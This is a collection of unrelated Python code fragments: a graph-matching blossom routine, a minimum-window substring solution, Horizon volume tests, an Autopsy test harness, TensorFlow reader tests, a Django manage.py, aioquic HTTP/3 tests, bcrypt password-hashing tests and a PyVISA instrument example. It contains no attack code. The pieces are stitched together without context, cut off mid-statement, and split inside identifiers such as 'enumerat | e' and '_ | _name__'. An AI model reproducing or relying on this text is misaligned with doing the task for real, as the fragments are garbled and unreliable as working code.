# If we expand a T-blossom during a stage, its sub-blossoms must be
# relabeled.
if (not endstage) and label.get(b) == 2:
# Start at the sub-blossom through which the expanding
# blossom obtained its label, and relabel sub-blossoms untili
# we reach the base.
# Figure out through which sub-blossom the expanding blossom
# obtained its label initially.
entrychild = inblossom[labeledge[b][1]]
# Decide in which direction we will go round the blossom.
j = b.childs.index(entrychild)
if j & 1:
# Start index is odd; go forward and wrap.
j -= len(b.childs)
jstep = 1
else:
# Start index is even; go backward.
jstep = -1
# Move along the blossom until we get to the base.
v, w = labeledge[b]
while j != 0:
# Relabel the T-sub-blossom.
if jstep == 1:
p, q = b.edges[j]
else:
q, p = b.edges[j-1]
label[w] = None
label[q] = None
assignLabel(w, 2, v)
# Step to the next S-sub-blossom and note its forward edge.
allowedge[(p, q)] = allowedge[(q, p)] = True
j += jstep
if jstep == 1:
v, w = b.edges[j]
else:
w, v = b.edges[j-1]
# Step to the next T-sub-blossom.
allowedge[(v, w)] = allowedge[(w, v)] = True
j += jstep
# Relabel the base T-sub-blossom WITHOUT stepping through to
# its mate (so don't call assignLabel).
bw = b.childs[j]
label[w] = label[bw] = 2
labeledge[w] = labeledge[bw] = (v, w)
bestedge[bw] = None
# Continue along the blossom until we get back to entrychild.
j += jstep
while b.childs[j] != entrychild:
# Examine the vertices of the sub-blossom to see whether
# |
from collections import defaultdict
class Solution(object):
def minWindow(self, S, T):
"""
:type S: str
:type T: str
:rtype: str
"""
pre = defaultdict(list)
for i, c in enumerat | e(T, -1):
pre[c].append(i)
for val in pre.values():
val.reverse()
start_index = [None] * (len(T) + 1)
lo, hi = float('-inf'), 0
| for i, c in enumerate(S):
start_index[-1] = i
for p in pre[c]:
if start_index[p] is not None:
start_index[p + 1] = start_index[p]
if (c == T[-1] and start_index[-2] is not None
and i - start_index[-2] < hi - lo):
lo, hi = start_index[-2], i
if lo < 0:
return ''
else:
return S[lo:hi+1]
# print(Solution().minWindow("abcdebdde", "bde"))
# print(Solution().minWindow("nkzcnhczmccqouqadqtmjjzltgdzthm", "bt"))
print(Solution().minWindow("cnhczmccqouqadqtmjjzl", "mm"))
|
_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.volume_get(IsA(http.HttpRequest), snapshot.volume_id).\
AndReturn(self.cinder_volumes.first())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=snapshot.id,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get snapshot from url
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = reverse('horizon:project:volumes:index')
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'volume_snapshot_get',
'volume_snapshot_list',
'extension_supported'),
api.glance: ( | 'image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_volume(self):
vo | lume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A copy of a volume',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
cinder.volume_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volumes.list())
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_get(IsA(http.HttpRequest),
volume.id).AndReturn(self.cinder_volumes.first())
cinder.extension_supported(IsA(http.HttpRequest),
'AvailabilityZones').AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=None,
source_volid=volume.id).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
redirect_url = reverse('horizon:project:volumes:index')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_snapshot_get',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
|
est_data.common_log_path, "w", "utf_8")
warning_log = codecs.open(test_data.warning_log, "w", "utf_8")
rep_path = make_local_path(test_data.main_config.output_dir)
rep_path = rep_path.replace("\\\\", "\\")
for file in os.listdir(logs_path):
log = codecs.open(make_path(logs_path, file), "r", "utf_8")
try:
for line in log:
line = line.replace(rep_path, "test_data")
if line.startswith("SEVERE"):
common_log.write(file +": " + line)
except UnicodeDecodeError as e:
pass
log.close()
common_log.write("\n")
common_log.close()
srtcmdlst = ["sort", test_data.common_log_path, "-o", test_data.common_log_path]
subprocess.call(srtcmdlst)
except (OSError, IOError) as e:
Errors.print_error("Error: Unable to generate the common log.")
Errors.print_error(str(e) + "\n")
Errors.print_error(traceback.format_exc())
logging.critical(traceback.format_exc())
def _fill_ingest_data(test_data):
"""Fill the TestDatas variables that require the log files.
Args:
test_data: the TestData to modify
"""
try:
# Open autopsy.log.0
log_path = make_path(test_data.logs_dir, "autopsy.log.0")
log = open(log_path)
# Set the TestData start time based off the first line of autopsy.log.0
# *** If logging time format ever changes this will break ***
test_data.start_date = log.readline().split(" org.")[0]
# Set the test_data ending time based off the "create" time (when the file was copied)
test_data.end_date = time.ctime(os.path.getmtime(log_path))
except IOError as e:
Errors.print_error("Error: Unable to open autopsy.log.0.")
Errors.print_error(str(e) + "\n")
logging.warning(traceback.format_exc())
# Start date must look like: ""
# End date must look like: "Mon Jul 16 13:02:42 2012"
# *** If logging time format ever changes this will break ***
start = datetime.datetime.strptime(test_data.start_date, "%Y-%m-%d %H:%M:%S.%f")
end = datetime.datetime.strptime(test_data.end_date, "%a %b %d %H:%M:%S %Y")
test_data.total_test_time = str(end - start)
try:
# Set Autopsy version, heap space, ingest time, and service times
version_line = search_logs("INFO: Application name: Autopsy, version:", test_data)[0]
test_data.autopsy_version = get_word_at(version_line, 5).rstrip(",")
test_data.heap_space = search_logs("Heap memory usage:", test_data)[0].rstrip().split(": ")[1]
ingest_line = search_logs("Ingest (including enqueue)", test_data)[0]
test_data.total_ingest_time = get_word_at(ingest_line, 6).rstrip()
message_line_count = find_msg_in_log_set("Ingest messages count:", test_data)
test_data.indexed_files = message_line_count
files_line_count = find_msg_in_log_set("Indexed files count:", test_data)
test_data.indexed_files = files_line_count
chunks_line_count = find_msg_in_log_set("Indexed file chunks count:", test_data)
test_data.indexed_chunks = chunks_line_count
except (OSError, IOError) as e:
Errors.print_error("Error: Unable to find the required information to fill test_config data.")
Errors.print_error(str(e) + "\n")
logging.critical(traceback.format_exc())
print(traceback.format_exc())
try:
service_lines = find_msg_in_log("autopsy.log.0", "to process()", test_data)
service_list = []
for line in service_lines:
words = line.split(" ")
# Kind of forcing our way into getting this data
# If this format changes, the tester will break
i = words.index("secs.")
times = words[i-4] + " "
times += words[i-3] + " "
times += words[i-2] + " "
times += words[i-1] + " "
times += words[i]
service_list.append(times)
test_data.service_times = "; ".join(service_list)
except (OSError, IOError) as e:
Errors.print_error("Error: Unknown fatal error when finding service times.")
Errors.print_error(str(e) + "\n")
logging.critical(traceback.format_exc())
def _report_all_errors():
"""Generate a list of all the errors found in the common log.
Returns:
a listof_String, the errors found in the common log
"""
try:
return get_warnings() + get_exceptions()
except (OSError, IOError) as e:
Errors.print_error("Error: Unknown fatal error when reporting all errors.")
Errors.print_error(str(e) + "\n")
logging.warning(traceback.format_exc())
def search_common_log(string, test_data):
"""Search the common log for any instances of a given string.
Args:
string: the String to search for.
test_data: the TestData that holds the log to search. |
Returns:
a listof_String, all the lines that the string is found on
"""
results = []
log = codecs.ope | n(test_data.common_log_path, "r", "utf_8")
for line in log:
if string in line:
results.append(line)
log.close()
return results
def print_report(errors, name, okay):
"""Print a report with the specified information.
Args:
errors: a listof_String, the errors to report.
name: a String, the name of the report.
okay: the String to print when there are no errors.
"""
if errors:
Errors.print_error("--------< " + name + " >----------")
for error in errors:
Errors.print_error(str(error))
Errors.print_error("--------< / " + name + " >--------\n")
else:
Errors.print_out("-----------------------------------------------------------------")
Errors.print_out("< " + name + " - " + okay + " />")
Errors.print_out("-----------------------------------------------------------------\n")
def get_exceptions(test_data):
"""Get a list of the exceptions in the autopsy logs.
Args:
test_data: the TestData to use to find the exceptions.
Returns:
a listof_String, the exceptions found in the logs.
"""
exceptions = []
logs_path = test_data.logs_dir
results = []
for file in os.listdir(logs_path):
if "autopsy.log" in file:
log = codecs.open(make_path(logs_path, file), "r", "utf_8")
ex = re.compile("\SException")
er = re.compile("\SError")
for line in log:
if ex.search(line) or er.search(line):
exceptions.append(line)
log.close()
return exceptions
def get_warnings(test_data):
"""Get a list of the warnings listed in the common log.
Args:
test_data: the TestData to use to find the warnings
Returns:
listof_String, the warnings found.
"""
warnings = []
common_log = codecs.open(test_data.warning_log, "r", "utf_8")
for line in common_log:
if "warning" in line.lower():
warnings.append(line)
common_log.close()
return warnings
def copy_logs(test_data):
"""Copy the Autopsy generated logs to output directory.
Args:
test_data: the TestData whose logs will be copied
"""
try:
# copy logs from autopsy case's Log folder
if test_data.isMultiUser:
log_dir = os.path.join(test_data.output_path, AUTOPSY_TEST_CASE, socket.gethostname(), "Log")
else:
log_dir = os.path.join(test_data.output_path, AUTOPSY_TEST_CASE, "Log")
shutil.copytree(log_dir, test_data.logs_d |
17
queue_capacity = 1234
name = "my_batch"
features = {"feature": tf.FixedLenFeature(shape=[0], dtype=tf.float32)}
with tf.Graph().as_default() as g, self.test_session(graph=g) as sess:
features = tf.contrib.learn.io.read_batch_record_features(
_VALID_FILE_PATTERN, batch_size, features, randomize_input=False,
queue_capacity=queue_capacity, reader_num_threads=2,
parser_num_threads=2, name=name)
self.assertEqual("%s/fifo_queue_1_Dequeue:0" % name,
features["feature"].name)
file_name_queue_name = "%s/file_name_queue" % name
file_names_name = "%s/input" % file_name_queue_name
example_queue_name = "%s/fifo_queue" % name
parse_example_queue_name = "%s/fifo_queue" % name
op_nodes = test_util.assert_ops_in_graph({
file_names_name: "Const",
file_name_queue_name: "FIFOQueue",
"%s/read/TFRecordReader" % name: "TFRecordReader",
example_queue_name: "FIFOQueue",
parse_example_queue_name: "FIFOQueue",
name: "QueueDequeueMany"
}, g)
self.assertAllEqual(_FILE_NAMES, sess.run(["%s:0" % file_names_name])[0])
self.assertEqual(
queue_capacity, op_nodes[example_queue_name].attr["capacity"].i)
def test_one_epoch(self):
batch_size = 17
queue_capacity = 1234
name = "my_batch"
with tf.Graph().as_default() as g, self.test_session(graph=g) as sess:
inputs = tf.contrib.learn.io.read_batch_examples(
_VALID_FILE_PATTERN, batch_size,
reader=tf.TFRecordReader, randomize_input=True,
num_epochs=1,
queue_capacity=queue_capacity, name=name)
self.assertEqual("%s:1" % name, inputs.name)
file_name_queue_name = "%s/file_name_queue" % name
file_name_queue_limit_name = (
"%s/limit_epochs/epochs" % file_name_queue_name)
file_names_name = "%s/input" % file_name_queue_name
example_queue_name = "%s/random_shuffle_queue" % name
op_nodes = test_util.assert_ops_in_graph({
file_names_name: "Const",
file_name_queue_name: "FIFOQueue",
"%s/read/TFRecordReader" % name: "TFRecordReader",
example_queue_name: "RandomShuffleQueue",
name: "QueueDequeueUpTo",
file_name_queue_limit_name: "Variable"
}, g)
self.assertEqual(
set(_FILE_NAMES), set(sess.run(["%s:0" % file_names_name])[0]))
self.assertEqual(
queue_capacity, op_nodes[example_queue_name].attr["capacity"].i)
def test_batch_randomized(self):
batch_size = 17
queue_capacity = 1234
name = "my_batch"
with tf.Graph().as_default() as g, self.test_session(graph=g) as sess:
inputs = tf.contrib.learn.io.read_batch_examples(
_VALID_FILE_PATTERN, batch_size,
reader=tf.TFRecordReader, randomize_input=True,
queue_capacity=queue_capacity, name=name)
self.assertEqual("%s:1" % name, inputs.name)
file_name_queue_name = "%s/file_name_queue" % name
file_names_name = "%s/input" % file_name_queue_name
example_queue_name = "%s/random_shuffle_queue" % name
op_nodes = test_util.assert_ops_in_graph({
file_names_name: "Const",
file_name_queue_name: "FIFOQueue",
"%s/read/TFRecordReader" % name: "TFRecordReader",
example_queue_name: "RandomShuffleQueue",
name: "QueueDequeueMany"
}, g)
self.assertEqual(
set(_FILE_NAMES), set(sess.run(["%s:0" % file_names_name])[0]))
self.assertEqual(
queue_capacity, op_nodes[example_queue_name].attr["capacity"].i)
def _create_temp_file(self, lines):
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "temp_file")
gfile.Open(filename, "w").write(lines)
return filename
def _create_sorted_temp_files(self, lines_list):
tempdir = tempfile.mkdtemp()
filenames = []
for i, lines in enumerate(lines_list):
filename = os.path.join(tempdir, "temp_file%05d" % i)
gfile.Open(filename, "w").write(lines)
filenames.append(filename)
return filenames
def test_read_text_lines(self):
gfile.Glob = self._orig_glob
filename = self._create_temp_file("ABC\nDEF\nGHK\n")
batch_size = 1
queue_capacity = 5
name = "my_batch"
with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
inputs = tf.contrib.learn.io.read_batch_examples(
filename, batch_size, reader=tf.TextLineReader,
randomize_input=False, num_epochs=1, queue_capacity=queue_capacity,
name=name)
session.run(tf.initialize_local_variables())
coord = tf.train.Coordinator()
tf.train.start_queue_runners(session, coord=coord)
self.assertAllEqual(session.run(inputs), [b"ABC"])
self.assertAllEqual(session.run(inputs), [b"DEF"])
self.assertAllEqual(session.run(inputs), [b"GHK"])
with self.assertRaises(errors.OutOfRangeError):
session.run(inputs)
coord.request_stop()
def test_read_text_lines_multifile(self):
gfile.Glob = self._orig_glob
filenames = self._create_sorted_temp_files(["ABC\n", "DEF\nGHK\n"])
batch_size = 1
queue_capacity = 5
name = "my_batch"
with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
inputs = tf.contrib.learn.io.read_batch_examples(
filenames, batch_size, reader=tf.TextLineReader,
randomize_input=False, num_epochs=1, queue_capacity=queue_capacity,
name=name)
session.run(tf.initialize_local_variables())
coord = tf.train.Coordinator()
tf.train.start_queue_runners(session, coord=coord)
self.assertAllEqual(session.run(inputs), [b"ABC"])
self.assertAllEqual(session.run(inputs), [b"DEF"])
self.assertAllEqual(session.run(inputs), [b"GHK"])
with self.assertRaises(errors.OutOfRangeError):
session.run(inputs)
coord.request_stop()
def test_batch_text_lines(self):
gfile.Glob = self._orig_glob
filename = self._create_temp_file("A\nB\nC\nD\nE\n")
batch_size = 3
queue_capacity = 10
name = "my_batch"
with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
inputs = tf.contrib.learn.io.read_batch_examples(
[filename], batch_size, reader=tf.TextLineReader,
randomize_input=False, num_epochs=1, queue_capacity=queue_capacity,
read_batch_size=10, name=name)
session.run(tf.initialize_local_variables())
coord = tf.train.Coordinator()
tf.train.start_queue_runners(session, coord=coord)
self.assertAllEqual(session.run(inputs), [b"A", b"B", b"C"])
self.assertAllEqual(session.run(inputs), [b"D", b"E"])
with self.assertRaises(errors.OutOfRangeError):
session.run(inputs)
coord.request_stop()
def test_keyed_read_text_lines(self):
gfile.Glob = self._orig_glob
filename = self._create_temp_file("ABC\nDEF\nGHK\n")
batch_size = 1
queue_capacity = 5
name = "my_batch"
with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
keys, inputs = tf.contrib.learn.io.read_keyed_batch_examples(
filename, batch_size,
reader=tf.TextLineReader, randomize_input=False,
num_epochs=1, queue_capacity=queue_capacity, name=name)
session.run(tf.initialize_local_variables())
coord = tf.train.Coordinator()
tf.train.start_queue_runners(sess | ion, coord=coord)
self.assertAllEqual(session.run([keys, inputs]),
[[filename.encode("utf-8") + b":1"], [b"ABC"]])
self.assertAllEqual(session.run([keys, inputs]),
[[filename.encode("utf-8") + b":2"], [b"DEF"]])
self.assertAllEqual(session.run([keys, inputs]),
[[filename.encode("utf-8") + b":3"], [b"GHK"]])
with self.assertRaises(errors.OutOfRangeError):
ses | sion.run(inputs)
coord.request_stop()
def test_keyed_parse_json(self):
gfile.Glob = self._orig_glob
filename = self._create_temp_file(
'{"features": {"feature": {"age": {" |
#!/usr/bin/env python
import os
import sys
if _ | _name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "weibome.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| |
quic_server.closed,
(
ErrorCode.HTTP_FRAME_UNEXPECTED,
"DATA frame is not allowed in this state",
),
)
def test_handle_request_frame_headers_after_trailers(self):
"""
We should not receive HEADERS after receiving trailers.
"""
quic_client = FakeQuicConnection(
configuration=QuicConfiguration(is_client=True)
)
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
stream_id = quic_client.get_next_available_stream_id()
h3_client.send_headers(
stream_id=stream_id,
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
],
)
h3_client.send_headers(
stream_id=stream_id, headers=[(b"x-some-trailer", b"foo")], end_stream=True
)
h3_transfer(quic_client, h3_server)
h3_server.handle_event(
StreamDataReceived(
stream_id=0, data=encode_frame(FrameType.HEADERS, b""), end_stream=False
)
)
self.assertEqual(
quic_server.closed,
(
ErrorCode.HTTP_FRAME_UNEXPECTED,
"HEADERS frame is not allowed in this state",
),
)
def test_handle_request_frame_push_promise_from_client(self):
"""
A server should not receive PUSH_PROMISE on a request stream.
"""
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_server = H3Connection(quic_server)
h3_server.handle_event(
StreamDataReceived(
stream_id=0,
data=encode_frame(FrameType.PUSH_PROMISE, b""),
end_stream=False,
)
)
self.assertEqual(
quic_server.closed,
(ErrorCode.HTTP_FRAME_UNEXPECTED, "Clients must not send PUSH_PROMISE"),
)
def test_handle_request_frame_wrong_frame_type(self):
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_server = H3Connection(quic_server)
h3_server.handle_event(
StreamDataReceived(
stream_id=0,
data=encode_frame(FrameType.SETTINGS, b""),
end_stream=False,
)
)
self.assertEqual(
quic_server.closed,
(ErrorCode.HTTP_FRAME_UNEXPECTED, "Invalid frame type on request stream"),
)
def test_request(self):
with h3_client_and_server() as (quic_client, quic_server):
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
# make first request
self._make_request(h3_client, h3_server)
# make second request
self._make_request(h3_client, h3_server)
# make third request -> dynamic table
self._make_request(h3_client, h3_server)
def test_request_headers_only(self):
with h3_client_and_server() as (quic_client, quic_server):
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
# send request
stream_id = quic_client.get_next_available_stream_id()
h3_client.send_headers(
stream_id=stream_id,
headers=[
(b":method", b"HEAD"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
(b"x-foo", b"client"),
],
end_stream=True,
)
# receive request
events = h3_transfer(quic_client, h3_server)
self.assertEqual(
events,
[
HeadersReceived(
headers=[
(b":method", b"HEAD"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
(b"x-foo", b"client"),
],
stream_id=stream_id,
stream_ended=True,
)
],
)
# send response
h3_server.send_headers(
stream_id=stream_id,
headers=[
(b":status", b"200"),
(b"con | tent-type", b"text/html; charset=utf-8"),
(b"x-foo", b"server"),
],
end_stream=True,
)
# receive response
events = h3_transfer(quic_server, h3_client)
self.assertEqu | al(
events,
[
HeadersReceived(
headers=[
(b":status", b"200"),
(b"content-type", b"text/html; charset=utf-8"),
(b"x-foo", b"server"),
],
stream_id=stream_id,
stream_ended=True,
)
],
)
def test_request_fragmented_frame(self):
quic_client = FakeQuicConnection(
configuration=QuicConfiguration(is_client=True)
)
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
# send request
stream_id = quic_client.get_next_available_stream_id()
h3_client.send_headers(
stream_id=stream_id,
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
(b"x-foo", b"client"),
],
)
h3_client.send_data(stream_id=stream_id, data=b"hello", end_stream=True)
# receive request
events = h3_transfer(quic_client, h3_server)
self.assertEqual(
events,
[
HeadersReceived(
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
(b"x-foo", b"client"),
],
stream_id=stream_id,
stream_ended=False,
),
DataReceived(data=b"h", stream_id=0, stream_ended=False),
DataReceived(data=b"e", stream_id=0, stream_ended=False),
DataReceived(data=b"l", stream_id=0, stream_ended=False),
DataReceived(data=b"l", stream_id=0, stream_ended=False),
DataReceived(data=b"o", stream_id=0, stream_ended=False),
DataReceived(data=b"", stream_id=0, stream_ended=True),
],
)
# send push promise
push_stream_id = h3_server.send_push_promise(
stream_id=stream_id,
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/app.txt"),
],
)
self.assertEqual(push_stream_id, 15)
# send response
h3_server.send_headers(
stream_id=stream_id,
headers=[
(b":status", b"200"),
(b"content-type", b"text/html; charset=utf-8"),
],
end_stream=False,
)
h3_server.send_data(stream_id=stream_id, data=b"html", end_stream=True)
# fulfill push pro |
# -*- coding:utf-8 -*-
from django import test
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.core.management import call_command
from mock import patch
from nose.tools import eq_
class BcryptTests(test.TestCase):
def setUp(self):
super(BcryptTests, self).setUp()
User.objects.create_user('john', 'johndoe@example.com',
password='123456')
User.objects.create_user('jane', 'janedoe@example.com',
password='abc')
User.objects.create_user('jude', 'jeromedoe@example.com',
password=u'abcéäêëôøà')
def test_bcrypt_used(self):
"""Make sure bcrypt was used as the hash."""
eq_(User.objects.get(username='john').password[:7], 'bcrypt$')
eq_(User.objects.get(username='jane').password[:7], 'bcrypt$')
eq_(User.objects.get(username='jude').password[:7], 'bcrypt$')
def test_bcrypt_auth(self):
"""Try authenticating."""
assert authenticate(username='john', password='123456')
assert authenticate(username='jane', password='abc')
assert not authenticate(username='jane', password='123456')
assert authenticate(username='jude', password=u'abcéäêëôøà')
assert not authenticate(username='jude', password=u'çççbbbààà')
@patch.object(settings._wrapped, 'HMAC_KEYS', dict())
def test_nokey(self):
"""With no HMAC key, no dice."""
assert not authenticate(username='john', password='123456')
assert not authenticate(username='jane', password='abc')
assert not authenticate(username='jane', password='123456')
assert not authenticate(username='jude', password=u'abcéäêëôøà')
assert not authenticate(username='jude', password=u'çççbbbààà')
def test_password_from_django14(self):
"""Test that a password generated by django_sha2 with django 1.4 is
recognized and changed to a 1.3 version"""
# We can't easily call 1.4's hashers so we hardcode the passwords as
# returned with the specific salts and hmac_key in 1.4.
prefix = 'bcrypt2011_01_01$2a$12$'
suffix = '$2011-01-01'
raw_hashes = {
'john': '02CfJWdVwLK80jlRe/Xx1u8sTHAR0JUmKV9YB4BS.Os4LK6nsoLie',
'jane': '.ipDt6gRL3CPkVH7FEyR6.8YXeQFXAMyiX3mXpDh4YDBonrdofrcG',
'jude': '6Ol.vgIFxMQw0LBhCLtv7OkV.oyJjen2GVMoiNcLnbsljSfYUkQqe',
}
u = User.objects.get(username="john")
django14_style_password = "%s%s%s" % (prefix, raw_hashes['john'],
suffix)
u.password = django14_style_passw | ord
assert u.check_password('123456')
eq_(u.password[:7], | 'bcrypt$')
u = User.objects.get(username="jane")
django14_style_password = "%s%s%s" % (prefix, raw_hashes['jane'],
suffix)
u.password = django14_style_password
assert u.check_password('abc')
eq_(u.password[:7], 'bcrypt$')
u = User.objects.get(username="jude")
django14_style_password = "%s%s%s" % (prefix, raw_hashes['jude'],
suffix)
u.password = django14_style_password
assert u.check_password(u'abcéäêëôøà')
eq_(u.password[:7], 'bcrypt$')
def test_hmac_autoupdate(self):
"""Auto-update HMAC key if hash in DB is outdated."""
# Get HMAC key IDs to compare
old_key_id = max(settings.HMAC_KEYS.keys())
new_key_id = '2020-01-01'
# Add a new HMAC key
new_keys = settings.HMAC_KEYS.copy()
new_keys[new_key_id] = 'a_new_key'
with patch.object(settings._wrapped, 'HMAC_KEYS', new_keys):
# Make sure the database has the old key ID.
john = User.objects.get(username='john')
eq_(john.password.rsplit('$', 1)[1], old_key_id)
# Log in.
assert authenticate(username='john', password='123456')
# Make sure the DB now has a new password hash.
john = User.objects.get(username='john')
eq_(john.password.rsplit('$', 1)[1], new_key_id)
def test_rehash(self):
"""Auto-upgrade to stronger hash if needed."""
# Set a sha256 hash for a user. This one is "123".
john = User.objects.get(username='john')
john.password = ('sha256$7a49025f024ad3dcacad$aaff1abe5377ffeab6ccc68'
'709d94c1950edf11f02d8acb83c75d8fcac1ebeb1')
john.save()
# The hash should be sha256 now.
john = User.objects.get(username='john')
eq_(john.password.split('$', 1)[0], 'sha256')
# Log in (should rehash transparently).
assert authenticate(username='john', password='123')
# Make sure the DB now has a bcrypt hash.
john = User.objects.get(username='john')
eq_(john.password.split('$', 1)[0], 'bcrypt')
# Log in again with the new hash.
assert authenticate(username='john', password='123')
def test_management_command(self):
"""Test password update flow via management command, from default
Django hashes, to hardened hashes, to bcrypt on log in."""
john = User.objects.get(username='john')
john.password = 'sha1$3356f$9fd40318e1de9ecd3ab3a5fe944ceaf6a2897eef'
john.save()
# The hash should be sha1 now.
john = User.objects.get(username='john')
eq_(john.password.split('$', 1)[0], 'sha1')
# Simulate calling management command
call_command('strengthen_user_passwords')
# The hash should be 'hh' now.
john = User.objects.get(username='john')
eq_(john.password.split('$', 1)[0], 'hh')
# Logging in will convert the hardened hash to bcrypt.
assert authenticate(username='john', password='123')
# Make sure the DB now has a bcrypt hash.
john = User.objects.get(username='john')
eq_(john.password.split('$', 1)[0], 'bcrypt')
# Log in again with the new hash.
assert authenticate(username='john', password='123')
|
#####################################
# Example how to control Agilent Function egenrator over GPIB
# Author, Peter Vago, NI Systems Engineer, 2016
#
# PyVISA 1.8 version is used.
# For migrating from older version (<1.5) read this: https://media.readthedocs.org/pdf/pyvisa/master/pyvisa.pdf
#
################################## | ##
import time
import sys
def open_instrument():
import visa
import socket
rm = visa.ResourceManager('') # If you have NI-VISA installed
#rm = visa.ResourceManager('@py') # If you have PyVisa-Py installed
## If you want discover your instruments - GPIB
#rm.list_resources()
## response will be like this: ('ASRL1::INSTR', 'ASRL2::INSTR', 'GPIB0::14::INSTR')
try:
#my_instrument = rm.open_resource('TCPIP0::127.0.0.1::6340::SOCKET')
| my_instrument = rm.open_resource('TCPIP::10.92.7.134::40010::SOCKET')
return my_instrument,0
except:
print("Error: Server seems to be not running.")
return 0,2 #2 ->Error code
def close_instrument(instr):
instr.close()
def manage_client_parameters(my_instrument):
# print (my_instrument.read_termination)
my_instrument.chunk_size = 15
#print(my_instrument.query_delay); # messagebased.py, line 118
